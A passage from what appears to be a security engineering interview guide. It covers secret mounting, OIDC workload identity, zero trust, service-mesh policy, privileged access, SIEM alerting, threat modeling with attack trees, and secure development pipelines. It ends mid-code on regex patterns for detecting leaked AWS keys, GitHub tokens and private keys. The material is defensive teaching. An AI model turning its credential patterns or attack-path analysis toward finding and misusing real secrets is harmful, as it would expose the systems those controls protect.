    DB_PASSWORD: ${ssm:/prod/db/password~true}  # resolved at deploy, still in env
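For the volume-mounted option, the application only has to read a file. The sketch below reads one key from a mount directory such as /run/secrets, with an optional environment-variable fallback for local development. The function and parameter names are hypothetical. Reading at call time instead of once at startup lets the app pick up updates when the kubelet refreshes a mounted Secret (subPath mounts are not refreshed).

```python
import os
from pathlib import Path
from typing import Optional


def read_secret(name: str, base_dir: str = "/run/secrets",
                env_fallback: Optional[str] = None) -> str:
    """Read a volume-mounted secret (one file per key), optionally falling back to an env var."""
    path = Path(base_dir) / name
    try:
        return path.read_text(encoding="utf-8").rstrip("\n")   # drop trailing newline only
    except FileNotFoundError:
        if env_fallback and env_fallback in os.environ:
            return os.environ[env_fallback]
        raise
```

With the Deployment above, read_secret("password") returns the value of the password key in db-secret.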

7What is workload identity and how do OIDC federation patterns eliminate static credentials?

Workload identity assigns a cryptographic identity to a service or workload and allows it to authenticate to cloud services without static credentials (no API keys, no long-lived secrets).

# GitHub Actions → AWS (OIDC federation):
# 1. GitHub acts as an OIDC IdP, issues signed JWT to each workflow run
# 2. AWS IAM has a trust policy that accepts GitHub's JWTs
# 3. Workflow exchanges JWT for temporary AWS credentials via STS
# 4. No AWS_ACCESS_KEY_ID needed in GitHub Secrets!

# GitHub Actions workflow:
permissions:
  id-token: write    # allow requesting OIDC token
  contents: read

steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::123456789:role/GitHubActionsRole
      aws-region: us-east-1
      # ← no access keys needed, uses OIDC token

# IAM trust policy:
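{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"Federated": "arn:aws:iam::123:oidc-provider/token.actions.githubusercontent.com"},
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"},
      "StringLike": {
        "token.actions.githubusercontent.com:sub": "repo:myorg/myrepo:ref:refs/heads/main"
      }
    }
  }]
}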

# Kubernetes → AWS (IRSA — IAM Roles for Service Accounts):
# Each pod's service account gets an OIDC token
# Pod can assume an IAM role via STS without any stored credentials
# EKS cluster acts as OIDC provider

# GKE Workload Identity: same concept, GKE SA ↔ GCP SA binding
# Azure Workload Identity: K8s SA ↔ Azure Managed Identity
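When a federated role assumption fails, the usual cause is a mismatch between the token's sub/aud claims and the trust-policy conditions. The sketch below decodes a JWT payload for inspection and approximates a StringLike match. It does NOT verify the signature; STS does that. fnmatchcase only approximates IAM StringLike, because it also treats [...] as a character class. Function names are hypothetical.

```python
import base64
import fnmatch
import json


def unverified_claims(jwt: str) -> dict:
    """Decode a JWT's payload WITHOUT checking its signature (debugging only)."""
    payload_b64 = jwt.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)   # JWTs strip base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))


def sub_matches(claims: dict, pattern: str) -> bool:
    """Approximate an IAM StringLike condition (* and ?) on the `sub` claim."""
    return fnmatch.fnmatchcase(claims.get("sub", ""), pattern)
```

For example, a token issued to a workflow on main carries sub = "repo:myorg/myrepo:ref:refs/heads/main". A pattern like "repo:myorg/myrepo:*" would also admit other branches and pull requests, so keep the condition as narrow as the workflow allows.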

Zero-Trust Architecture

6 questions

1What is zero-trust security? How does it differ from the traditional perimeter model?

Traditional perimeter model ("castle and moat"): Trust everyone inside the network, distrust everyone outside. A VPN grants full internal network access, and once inside, lateral movement is easy. Failure modes: compromising one endpoint exposes everything reachable from it, and remote work and cloud services punch holes in the perimeter.

Zero-trust model: "Never trust, always verify." Every request is authenticated, authorized, and inspected regardless of where it originates — internal or external. The network location grants zero implicit trust.

Core zero-trust tenets (adapted from NIST SP 800-207):

All data sources and computing services are resources — no "trusted network"
All communication is secured regardless of network location
Access to individual resources is granted per-session, not per-network
Access is determined by dynamic policy (identity + device posture + context)
All authentication and authorization is logged and audited

Key technologies enabling zero-trust:

Identity (IdP): Strong authentication, MFA, continuous re-verification
Device trust: Device posture assessment (is it patched? enrolled? compliant?)
Microsegmentation: Network access restricted to specific service-to-service paths
mTLS: Service-to-service authentication in the service mesh
Least privilege: JIT access, short-lived credentials

2What is BeyondCorp and how did Google pioneer zero-trust for remote access?

Google's BeyondCorp (first described in a 2014 paper) removed the need for a corporate VPN. Every application is reachable from any network, and connecting from the internet is treated exactly like connecting from the office network. Access decisions are based on user identity + device trust, not network location.

BeyondCorp components:

Device inventory: All managed devices are enrolled, tracked, and given a certificate. Device posture (OS version, patch status, MDM enrollment) is assessed continuously.
Access proxy: All requests go through a central proxy that enforces policy. No direct access to backend services from the internet.
Trust engine: Combines user identity (strong auth, MFA) + device trust level → access decision. A fully patched managed device gets more access than a personal unmanaged device.

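# Access control logic (sketch; identity_provider, device_inventory, access_policies are placeholders):
from enum import IntEnum

class Trust(IntEnum):  # ordered levels, so >= comparisons are meaningful
    LOW = 1
    MEDIUM = 2
    HIGH = 3

def should_grant_access(user, device, resource, context):
    user_trust   = identity_provider.get_trust_level(user)    # Trust.LOW..Trust.HIGH
    device_trust = device_inventory.get_trust_level(device)   # e.g. unmanaged=LOW, managed+patched=HIGH

    policy = access_policies.get(resource)
    if policy is None:
        return False  # default deny for resources without a policy
    return (user_trust   >= policy.required_user_trust and
            device_trust >= policy.required_device_trust and
            context.location in policy.allowed_locations)  # contextual signal; source network grants no trust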

# Commercial products implementing BeyondCorp model:
# Google BeyondCorp Enterprise, Cloudflare Access, Zscaler Private Access,
# Palo Alto Prisma Access, Cisco Zero Trust

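Modern implementation: Cloudflare Zero Trust (Access) is one widely adopted example. An outbound-only tunnel (cloudflared) connects private applications to Cloudflare's edge in place of an inbound VPN. Every app gets its own access policy, SSO + MFA is enforced per app, and every access attempt is audit-logged. Browser-based apps need no VPN client.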
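To make the trust-engine idea concrete, here is a minimal sketch of the device half of the decision: posture signals map to a trust tier, and each app requires a minimum tier. The posture fields, the tiers, and `APP_POLICY` are hypothetical; a real trust engine pulls these signals from MDM and certificate infrastructure and re-evaluates them continuously.

```python
from dataclasses import dataclass
from enum import IntEnum


class DeviceTrust(IntEnum):
    UNTRUSTED = 0
    BASIC = 1
    FULL = 2


@dataclass
class DevicePosture:
    managed: bool          # enrolled in the device inventory / MDM
    has_device_cert: bool  # presents the certificate issued at enrollment
    os_patched: bool       # OS is within the supported patch window
    disk_encrypted: bool


def device_trust(p: DevicePosture) -> DeviceTrust:
    """Map posture signals to a trust tier (thresholds are illustrative)."""
    if not (p.managed and p.has_device_cert):
        return DeviceTrust.UNTRUSTED
    if p.os_patched and p.disk_encrypted:
        return DeviceTrust.FULL
    return DeviceTrust.BASIC


# Hypothetical per-app policy: minimum device tier; any app not listed is denied
APP_POLICY = {"wiki": DeviceTrust.BASIC, "payroll": DeviceTrust.FULL}


def can_access(app: str, user_mfa_verified: bool, posture: DevicePosture) -> bool:
    required = APP_POLICY.get(app)
    if required is None or not user_mfa_verified:
        return False  # default deny: unknown app or weak user authentication
    # The request's source network never appears in this decision
    return device_trust(posture) >= required
```

With this policy, a managed laptop that has fallen behind on patches still reaches the wiki but loses payroll access until it is updated, mirroring the idea that better-maintained devices get more access.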

3How do you implement zero-trust for microservices? Explain service mesh and policy engines.

# Service mesh (Istio) — zero-trust for microservices:
# Inject a sidecar proxy (Envoy) into every pod
# Proxies handle mTLS, authorization, and observability transparently

# Istio PeerAuthentication — enforce mTLS:
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata: { name: default, namespace: production }
spec:
  mtls:
    mode: STRICT   # reject any non-mTLS connection

# Istio AuthorizationPolicy — service-level firewall:
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata: { name: payments-authz, namespace: production }
spec:
  selector:
    matchLabels: { app: payment-service }
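  rules:
  - from:                 # from and to in ONE rule: both must match
    - source:
        principals: ["cluster.local/ns/production/sa/order-service"]  # only order-service
    to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/charge"]   # only this endpoint
  # action defaults to ALLOW; requests matching no rule are denied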

# Open Policy Agent (OPA) — policy as code:
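# Define authorization rules in Rego (OPA 1.x syntax; older releases write `allow {` without `if`)
package authz

default allow := false

# Role lookup from data loaded into OPA, e.g. {"user_roles": {"alice": "admin"}} (assumed layout)
user_role := data.user_roles

allow if {
    input.method == "GET"
    user_role[input.user] == "viewer"
}

allow if {
    user_role[input.user] == "admin"
}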

# OPA as K8s admission controller (Gatekeeper):
# Evaluate policies on every resource creation/modification
# Prevent misconfigured pods, enforce security baselines
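The AuthorizationPolicy semantics are easy to get wrong: once an ALLOW policy selects a workload, its rules are ORed, while the `from` and `to` fields inside a single rule are ANDed. Placing `from` and `to` in separate list items therefore creates two independent rules. The simplified Python model below (not Istio's implementation; exact string matching only, no wildcards, no DENY/CUSTOM actions) shows the difference.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Request:
    principal: str  # workload identity derived from the peer's mTLS certificate
    method: str
    path: str


@dataclass
class Rule:
    # An empty list means "any" for that field
    principals: list[str] = field(default_factory=list)
    methods: list[str] = field(default_factory=list)
    paths: list[str] = field(default_factory=list)

    def matches(self, r: Request) -> bool:
        # Every populated field must match: AND within a rule
        return ((not self.principals or r.principal in self.principals)
                and (not self.methods or r.method in self.methods)
                and (not self.paths or r.path in self.paths))


def allowed(rules: list[Rule], r: Request) -> bool:
    # ALLOW policy: any matching rule admits the request (OR across rules); no match = deny
    return any(rule.matches(r) for rule in rules)


ORDER_SA = "cluster.local/ns/production/sa/order-service"

# from + to inside ONE rule (intended: only order-service, only POST /api/v1/charge)
one_rule = [Rule(principals=[ORDER_SA], methods=["POST"], paths=["/api/v1/charge"])]

# from and to as SEPARATE rules: each one alone is enough to allow a request
two_rules = [Rule(principals=[ORDER_SA]),
             Rule(methods=["POST"], paths=["/api/v1/charge"])]
```

With `two_rules`, any workload in the mesh can POST to `/api/v1/charge`, and order-service can call any endpoint: exactly the over-permissive result the policy was meant to prevent.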

4What is privileged access management (PAM)? How do you secure privileged accounts?

Privileged accounts (root, admin, service accounts with broad permissions) are the primary target of attackers. PAM (Privileged Access Management) controls, monitors, and audits privileged access.

Core PAM controls:

No shared admin accounts: Every person has their own identity for privileged access — accountability and auditability
Just-in-time (JIT) access: Elevated privileges granted for a specific task, for a bounded time, then revoked automatically
Session recording: All privileged sessions recorded for audit and forensics
Credential vaulting: Privileged passwords checked out from a vault, rotated automatically after use
Break-glass procedures: Emergency access with automatic alerting when used

# JIT access with HashiCorp Boundary:
boundary connect ssh -target-id ttcp_123 -username alice
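# With credential brokering/injection configured (e.g. Vault-signed SSH certificates),
# alice connects without ever holding a long-lived key
# Sessions are time-limited; session recording is available depending on Boundary edition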

# AWS SSO / Identity Center JIT:
# Request a temporary elevated permission set via an approval workflow (e.g. AWS's open-source TEAM solution)
# 4-hour access window, all API calls logged to CloudTrail

# Bastion host (older approach) vs Zero-Trust:
# Bastion: single jump host, SSH/RDP through it → still persistent access
# Zero-Trust PAM: no persistent access, every session is ephemeral and audited

# Root account protection (AWS):
# Use root ONLY for tasks that require it (very few)
# Enforce hardware MFA on root
# Remove root access keys entirely
# Alert on any root account usage (EventBridge rule on CloudTrail events, or GuardDuty findings)
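The JIT principle (approved by someone else, bounded in time, revoked automatically) can be sketched with a small in-memory broker. `JitBroker`, `Grant`, and the 4-hour cap are hypothetical; in practice this logic lives in tools such as Boundary, an Identity Center approval workflow, or a PAM product.

```python
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class Grant:
    user: str
    role: str
    approver: str
    expires_at: float  # Unix timestamp


class JitBroker:
    """Hypothetical in-memory JIT broker: every elevation is approved, bounded, and expires."""

    MAX_TTL_SECONDS = 4 * 3600  # cap any single elevation at 4 hours

    def __init__(self, clock=time.time):
        self._clock = clock   # injectable so tests can control time
        self._grants = []
        self.audit_log = []   # append-only record of grants

    def grant(self, user, role, approver, ttl_seconds):
        if approver == user:
            raise PermissionError("self-approval is not allowed")
        ttl = min(ttl_seconds, self.MAX_TTL_SECONDS)
        g = Grant(user, role, approver, self._clock() + ttl)
        self._grants.append(g)
        self.audit_log.append(("grant", user, role, approver, g.expires_at))
        return g

    def has_role(self, user, role):
        now = self._clock()
        # Expired grants are dropped on every check: revocation needs no human action
        self._grants = [g for g in self._grants if g.expires_at > now]
        return any(g.user == user and g.role == role for g in self._grants)
```

Requesting 10 hours still yields a 4-hour grant, and once that window passes `has_role` returns False without anyone remembering to revoke it.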

5How do you implement continuous authentication and step-up auth for sensitive operations?

# Step-up authentication: require stronger auth for sensitive operations
# Even with an active session, re-verify before high-risk actions

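# Implementation (Flask sketch; assumes the MFA flow stores session["last_strong_auth"] as a Unix timestamp):
import time
from urllib.parse import urlencode
from flask import Flask, redirect, request, session

app = Flask(__name__)
STEP_UP_MAX_AGE = 15 * 60  # seconds since the last strong (MFA) authentication

def require_step_up_auth(action):
    """Return a redirect to step-up auth if the last strong auth is stale, else None."""
    last_strong_auth = session.get("last_strong_auth")
    if last_strong_auth is None or time.time() - last_strong_auth > STEP_UP_MAX_AGE:
        # URL-encode a relative `next`; the step-up endpoint must still reject absolute URLs
        query = urlencode({"next": request.full_path, "action": action})
        return redirect(f"/auth/step-up?{query}")
    return None  # auth is fresh enough

@app.route("/api/transfer", methods=["POST"])
def transfer_funds():
    step_up = require_step_up_auth("financial_transfer")
    if step_up is not None:
        return step_up
    # ... proceed with transfer
    return {"status": "accepted"}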

# Continuous authentication signals:
# Network location change → re-authenticate
# Device fingerprint change → re-authenticate
# Behavioral anomaly (typing pattern, mouse movement) → flag for review
# Off-hours access to sensitive resources → alert + step-up

# Adaptive authentication (risk-based):
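def calculate_risk_score(request, user):
    # request/user attributes are illustrative (IP history, geo-IP, usual hours, failed logins)
    score = 0
    if request.ip not in user.known_ips: score += 30
    if request.country != user.usual_country: score += 40
    if request.time.hour not in user.usual_hours: score += 20
    if user.recent_failed_logins > 3: score += 25
    return min(score, 100)  # weights sum to 115, so cap to keep the score in 0-100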

def get_required_auth_level(risk_score):
    if risk_score < 30: return "password"
    if risk_score < 60: return "mfa_soft"
    return "mfa_hardware"

6What is SIEM and how do you design effective security monitoring and alerting?

SIEM (Security Information and Event Management) aggregates, correlates, and analyzes security events across your infrastructure to detect threats and support incident response.

# What to log (at minimum):
# Authentication: all login attempts (success/failure), source IP, MFA outcome
# Authorization: all access denials, privilege escalations
# Data access: reads/writes to sensitive data (PII, financial, health)
# Configuration changes: IAM policy changes, security group changes, secret access
# Network: anomalous traffic patterns, DNS queries, outbound connections to new IPs

# Structured logging format (JSON):
{
  "timestamp": "2024-01-15T10:30:00Z",
  "event_type": "auth.login.failure",
  "user_id": "user_123",
  "source_ip": "203.0.113.5",
  "user_agent": "Mozilla/5.0...",
  "failure_reason": "invalid_password",
  "attempt_number": 3,
  "trace_id": "abc-123"
}

# Critical alerts (page on-call immediately):
# - Root account usage
# - IAM policy changes
# - Multiple failed logins followed by success (brute force)
# - Access from impossible travel (London → Tokyo in 2 hours)
# - Large data exfiltration (unusual data volume)
# - Secrets access outside normal patterns
# - Container escape or privilege escalation

# Alert fatigue prevention:
# High-fidelity alerts only — tune out noise before going to production
# Severity tiers: P1 (immediate page) / P2 (notify in 30 min) / P3 (review daily)
# Automated response for known patterns (auto-revoke compromised tokens)

# Tools: Splunk, Elastic SIEM, AWS Security Hub + GuardDuty, Datadog Security Monitoring
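The "impossible travel" alert above reduces to a speed check between consecutive logins. A minimal sketch, assuming each login has already been geolocated from its IP (geolocation is approximate, and VPNs or mobile carriers cause false positives); the `Login` shape and the 1,000 km/h threshold are hypothetical choices.

```python
import math
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 1000.0  # assumption: roughly airliner speed; tune for your org


@dataclass
class Login:
    user_id: str
    at: datetime  # timezone-aware
    lat: float    # from IP geolocation
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on Earth, in km."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(prev: Login, curr: Login) -> bool:
    km = haversine_km(prev.lat, prev.lon, curr.lat, curr.lon)
    hours = (curr.at - prev.at).total_seconds() / 3600
    if hours <= 0:
        return km > 100  # simultaneous (or out-of-order) logins far apart
    return km / hours > MAX_PLAUSIBLE_KMH


t0 = datetime(2024, 1, 15, 10, 0, tzinfo=timezone.utc)
london = Login("user_123", t0, 51.5074, -0.1278)
tokyo = Login("user_123", t0 + timedelta(hours=2), 35.6762, 139.6503)
print(impossible_travel(london, tokyo))  # True: about 9,560 km in 2 h
```

In a SIEM this usually runs as a correlation rule over the authentication stream, comparing each successful login with the user's previous one.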

Threat Modeling

5 questions

1What is threat modeling and what are the STRIDE and PASTA frameworks?

Threat modeling is a structured process for identifying security threats to a system during design, before code is written. Finding and fixing design flaws at this stage is far cheaper than fixing them in production (multipliers such as 100× are often quoted, though they are loosely sourced).

Four key questions (Adam Shostack):

What are we building? (system diagram)
What can go wrong? (threats)
What are we going to do about it? (mitigations)
Did we do a good enough job? (validation)

STRIDE (Microsoft): A mnemonic for threat categories applied to each element of a DFD (Data Flow Diagram):

Spoofing identity — pretending to be someone else → Authentication controls
Tampering with data — modifying data in transit or at rest → Integrity controls (message authentication codes such as HMAC, digital signatures)
Repudiation — denying an action was taken → Non-repudiation (audit logs, signatures)
Information disclosure — exposing data to unauthorized parties → Encryption, access control
Denial of service — making service unavailable → Rate limiting, redundancy
Elevation of privilege — gaining more access than allowed → Authorization controls, least privilege

PASTA (Process for Attack Simulation and Threat Analysis): Risk-centric, 7-stage methodology that aligns threats to business objectives. More comprehensive but complex. Used when you need to quantify risk and prioritize based on business impact.

2How do you create a Data Flow Diagram (DFD) for threat modeling? What are trust boundaries?

A Data Flow Diagram (DFD) maps the system's components and how data flows between them. It's the foundation of STRIDE threat modeling — you apply STRIDE to each element and each data flow.

DFD elements:

External entities: Users, external systems, third parties (rectangles) — outside your control
Processes: Components that transform data (circles/rounded rectangles) — your code
Data stores: Databases, caches, files (parallel lines) — where data rests
Data flows: Arrows showing how data moves between elements
Trust boundaries: Dashed lines separating zones of different trust levels

# Trust boundaries — where threats are highest:
# Every data flow that CROSSES a trust boundary needs scrutiny:
# Internet → Load Balancer:  boundary between internet and DMZ
# DMZ → App Server:          boundary between DMZ and internal network
# App Server → Database:     boundary between app tier and data tier
# App Server → External API: boundary between your system and third party
# Container → Host:          container boundary (escape risks)
# Browser → Backend:         untrusted client to trusted server

# For each trust boundary crossing, ask:
# STRIDE questions for each data flow across the boundary
# - Can the sender spoof their identity? (Spoofing)
# - Can the data be modified in transit? (Tampering)
# - Does the receiver log this for accountability? (Repudiation)
# - Could this expose sensitive data? (Info Disclosure)
# - Could this be used to overwhelm the receiver? (DoS)
# - Could this allow the sender to gain more privileges? (Elevation)
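The boundary-crossing rule is mechanical enough to script. A minimal sketch, assuming each DFD element has been tagged with a trust zone; `ZONE`, the element names, and the flows are hypothetical. It lists the flows that cross a zone boundary and expands each one into the six STRIDE questions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    data: str


# Hypothetical trust zone for each DFD element
ZONE = {
    "browser": "internet",
    "load_balancer": "dmz",
    "app_server": "internal",
    "worker": "internal",
    "database": "data",
    "payments_api": "third_party",
}

STRIDE_QUESTIONS = {
    "S": "Can the sender spoof its identity?",
    "T": "Can the data be modified in transit?",
    "R": "Does the receiver log this for accountability?",
    "I": "Could this expose sensitive data?",
    "D": "Could this be used to overwhelm the receiver?",
    "E": "Could this let the sender gain more privileges?",
}


def crossing_flows(flows):
    """Flows whose two endpoints sit in different trust zones."""
    return [f for f in flows if ZONE[f.src] != ZONE[f.dst]]


def stride_checklist(flows):
    """One review item per STRIDE category for every boundary-crossing flow."""
    return [(f"{f.src} -> {f.dst} ({f.data})", letter, question)
            for f in crossing_flows(flows)
            for letter, question in STRIDE_QUESTIONS.items()]


flows = [
    Flow("browser", "load_balancer", "login form"),
    Flow("load_balancer", "app_server", "HTTP request"),
    Flow("app_server", "worker", "background job"),  # same zone: not a crossing
    Flow("app_server", "database", "SQL query"),
    Flow("app_server", "payments_api", "charge request"),
]
```

Here four of the five flows cross a boundary, producing 24 review items; the same-zone `app_server -> worker` flow is left out of the checklist.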

3How do you prioritize threats? Explain DREAD and the risk matrix approach.

After identifying threats, you must prioritize them — you can't fix everything at once. Risk = Likelihood × Impact.

DREAD scoring (each factor rated 1-10, higher = worse; the overall score is usually the average of the five):

Damage — how much damage if exploited? (data loss, financial, reputational)
Reproducibility — how easily can the attack be reproduced?
Exploitability — how much skill/effort does exploitation require?
Affected users — how many users are impacted?
Discoverability — how easy is it to find the vulnerability?
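A minimal DREAD calculator, assuming the common convention of averaging the five 1-10 factors. The `Dread` class and the high/medium/low cut-offs are hypothetical choices, not part of any standard.

```python
from dataclasses import astuple, dataclass


@dataclass(frozen=True)
class Dread:
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int

    def __post_init__(self):
        for value in astuple(self):
            if not 1 <= value <= 10:
                raise ValueError("each DREAD factor must be between 1 and 10")

    def score(self) -> float:
        """Overall DREAD score: the mean of the five factors."""
        return sum(astuple(self)) / 5

    def rating(self) -> str:
        s = self.score()  # cut-offs below are illustrative
        if s >= 7:
            return "high"
        if s >= 4:
            return "medium"
        return "low"


# Example: SQL injection on a public login form
sqli = Dread(damage=9, reproducibility=9, exploitability=7,
             affected_users=10, discoverability=8)
```

Because every factor is subjective, two reviewers can score the same threat differently; that inconsistency is one reason many teams prefer the simpler risk matrix.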

# Risk matrix (simpler, preferred by many teams):
# Likelihood: High (likely within 1 year), Medium (possible), Low (unlikely)
# Impact: Critical (system compromise/major data breach), High, Medium, Low

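# Priority matrix (rows = likelihood, columns = impact):
#              | Low    | Medium | High   | Critical |
# High         | Medium | High   | High   | P0 Fix!  |
# Medium       | Low    | Medium | High   | High     |
# Low          | Low    | Low    | Medium | High     |
# Cells map to priorities: P0 Fix! → P0, High → P1, Medium → P2, Low → P3

def prioritize_threat(likelihood, impact):
    """Map (likelihood, impact) to a priority consistent with the matrix above."""
    matrix = {
        ("high", "critical"): "P0_immediate",
        ("high", "high"): "P1_sprint",
        ("high", "medium"): "P1_sprint",
        ("medium", "critical"): "P1_sprint",
        ("medium", "high"): "P1_sprint",
        ("low", "critical"): "P1_sprint",
        ("high", "low"): "P2_backlog",
        ("medium", "medium"): "P2_backlog",
        ("low", "high"): "P2_backlog",
    }
    return matrix.get((likelihood.lower(), impact.lower()), "P3_monitor")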

# Output: mitigation plan for each threat
# - Accept: risk is low, cost of mitigation exceeds benefit
# - Transfer: cyber insurance, SLA with third party
# - Mitigate: implement a control
# - Eliminate: remove the feature/component that introduces the risk

4How do you conduct a threat model for a new API? Walk through a practical example.

# Example: payment processing API
# Step 1: What are we building?
# DFD: Mobile App → API Gateway → Payment Service → Stripe API
#      Payment Service → PostgreSQL (orders, payment_tokens)
# Trust boundaries: Internet/DMZ, DMZ/Internal, Internal/External API

# Step 2: What can go wrong? (STRIDE per element)

# Data flow: Mobile App → API Gateway
# S: Can attacker spoof a legitimate user? → need strong auth (OAuth + MFA)
# T: Can they tamper with payment amount? → TLS + request signing + server-side validation
# R: Can user deny making a payment? → immutable audit log + signed receipts
# I: Does mobile app expose card data? → tokenize at source (never see raw PAN)
# D: DDoS on payment endpoint? → rate limiting per user, WAF, CDN
# E: Can user charge another user's card? → strict IDOR protection on payment methods

# Data store: PostgreSQL
# S: Can attacker pose as the payment service? → mTLS, DB credentials not shared
# T: Can DB data be modified without authorization? → DB user has minimal privileges
# I: Payment tokens exposed in breach? → tokens not PAN, still encrypt at rest
# E: Can app service access other customers' data? → row-level security, ORM filters

# Step 3: Mitigations
# - Implement: OAuth 2.0 + PKCE, mTLS for internal services, encrypted at-rest DB
# - Stripe tokenization handles PAN compliance
# - Audit log every payment event (immutable, append-only)
# - Rate limiting: 3 failed payment attempts → lock for 1 hour
# - Add to backlog: fraud detection ML model, velocity checks
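Two of the threats above (T: a tampered payment amount, E: charging someone else's card) come down to server-side checks. A hypothetical sketch: `Order`, `PaymentMethod`, and `build_charge` are illustrative names, not Stripe's API, and the returned dict stands in for whatever the real charge call needs.

```python
from dataclasses import dataclass
from decimal import Decimal, InvalidOperation


@dataclass
class Order:
    id: int
    owner_id: int
    total: Decimal  # computed server-side from the cart, never from the client


@dataclass
class PaymentMethod:
    id: int
    owner_id: int
    token: str      # processor token, never a raw PAN


class PaymentError(Exception):
    pass


def build_charge(user_id: int, order: Order, method: PaymentMethod, client_amount: str) -> dict:
    # E / IDOR: the order and the payment method must both belong to the caller.
    # Use the same error as "does not exist" so IDs can't be probed.
    if order.owner_id != user_id or method.owner_id != user_id:
        raise PaymentError("not found")
    # T: the client-supplied amount is only a cross-check; the server's total is authoritative
    try:
        claimed = Decimal(client_amount)
    except InvalidOperation:
        raise PaymentError("invalid amount") from None
    if claimed != order.total:
        raise PaymentError("amount mismatch")
    return {"amount_cents": int(order.total * 100), "source": method.token, "order_id": order.id}
```

Amounts travel as strings into `Decimal` so that values like 19.99 are compared exactly rather than through float rounding.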

5What is an attack tree and how do you use it to analyze complex attack chains?

An attack tree is a hierarchical diagram that represents the ways an attacker can achieve a goal (the root). AND nodes require all children to succeed; OR nodes require any one child. It helps identify the cheapest, most feasible attack path.

# Attack tree: "Steal customer PII"
#
# ROOT: Access customer PII database
#   OR:
#   ├── SQL Injection on web app
#   │     AND: web app has SQLi vulnerability
#   │     AND: DB user has SELECT on PII table (← defense: least privilege breaks AND)
#   │
#   ├── Compromise admin credentials
#   │     OR:
#   │     ├── Phishing attack on admin
#   │     │     AND: admin clicks malicious link
#   │     │     AND: no MFA (← defense: MFA breaks AND)
#   │     └── Credential stuffing
#   │           AND: admin reuses password from breach
#   │           AND: no MFA (← same defense breaks multiple paths)
#   │
#   └── SSRF via file upload feature
#         AND: upload service fetches user-provided URLs
#         AND: internal DB accessible from upload service (← network segmentation)

# Analysis: MFA on admin accounts breaks two separate attack paths
# Conclusion: implement MFA first — highest ROI defensive control

# Using attack trees for red team exercises:
# Build the tree for each crown-jewel asset
# Score each leaf: cost to attacker, likelihood
# Find cheapest complete path → that's your red team scenario
# Implement controls that cut the most paths, not the most expensive ones
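The "cheapest complete path" analysis can be computed directly: an AND node costs the sum of its children, an OR node costs its cheapest child, and a control that blocks a leaf makes that leaf impossible. The tree below mirrors the PII example; all leaf costs are hypothetical attacker-effort units.

```python
from dataclasses import dataclass, field


@dataclass
class Node:
    name: str
    kind: str = "LEAF"   # "AND", "OR", or "LEAF"
    cost: float = 0.0    # attacker cost for a leaf step (hypothetical units)
    children: list = field(default_factory=list)


def cheapest(node, blocked=frozenset()):
    """Minimum attacker cost to reach `node`; inf if the blocked leaves make it impossible."""
    if node.kind == "LEAF":
        return float("inf") if node.name in blocked else node.cost
    costs = [cheapest(child, blocked) for child in node.children]
    return sum(costs) if node.kind == "AND" else min(costs)


def leaf(name, cost):
    return Node(name, cost=cost)


tree = Node("steal_pii", "OR", children=[
    Node("sqli", "AND", children=[leaf("sqli_vuln", 5), leaf("db_user_reads_pii", 1)]),
    Node("admin_creds", "OR", children=[
        Node("phishing", "AND", children=[leaf("admin_clicks_link", 2), leaf("no_mfa", 0)]),
        Node("stuffing", "AND", children=[leaf("password_reused", 3), leaf("no_mfa", 0)]),
    ]),
    Node("ssrf", "AND", children=[leaf("fetches_user_urls", 4), leaf("db_reachable", 2)]),
])

print(cheapest(tree))                # 2: phishing is the cheapest path
print(cheapest(tree, {"no_mfa"}))    # 6: MFA removes both credential paths at once
```

Blocking `no_mfa` (deploying MFA) removes two paths with one control, which is the same conclusion the manual analysis reached.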

Secure Development

7 questions

1What is a Secure Development Lifecycle (SDL)? How do you shift security left?

SDL integrates security into every phase of software development rather than bolting it on at the end. "Shift left" means finding security issues earlier in the development cycle — when they're cheapest to fix.

Commonly quoted (though loosely sourced) relative costs of fixing a defect at different stages: Design ($1) → Development ($6) → Testing ($15) → Production ($300+). A vulnerability found in production after a breach can cost millions.

SDL phases:

Requirements: Security requirements alongside functional ones. Abuse cases (what can a malicious user do?). Regulatory compliance requirements (GDPR, PCI-DSS).
Design: Threat modeling. Architecture review. Data classification. Privacy by design.
Development: Secure coding standards. IDE plugins (SonarLint, CodeWhisperer security). Pre-commit hooks (secret scanning, SAST).
Testing: SAST (static analysis), DAST (dynamic scanning), SCA (dependency CVEs), penetration testing.
Deployment: Infrastructure-as-code security scanning (tfsec, Checkov). Container image scanning. Immutable deployments.
Operations: Runtime security monitoring. Vulnerability management. Incident response.

# Security in CI/CD pipeline:
# Every commit/PR:
#   → SAST: semgrep, CodeQL, SonarQube
#   → Secret scanning: gitleaks, detect-secrets
#   → Dependency audit: npm audit, pip-audit, snyk
#   → Container scan: trivy, grype
# Weekly:
#   → DAST on staging: OWASP ZAP, Burp Suite Enterprise
# Quarterly:
#   → Penetration test by external security firm
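Secret scanners such as gitleaks and detect-secrets ship large, tuned rule sets. A toy version of the pre-commit check illustrates the idea: scan only the lines being added in the staged diff for a few well-known credential formats. The rule names and `scan_staged_changes` are hypothetical; the three patterns cover AWS access key IDs, GitHub classic personal access tokens, and PEM private key headers.

```python
import re
import subprocess

# A few well-known credential formats (illustrative; real scanners ship hundreds of rules)
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_classic_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
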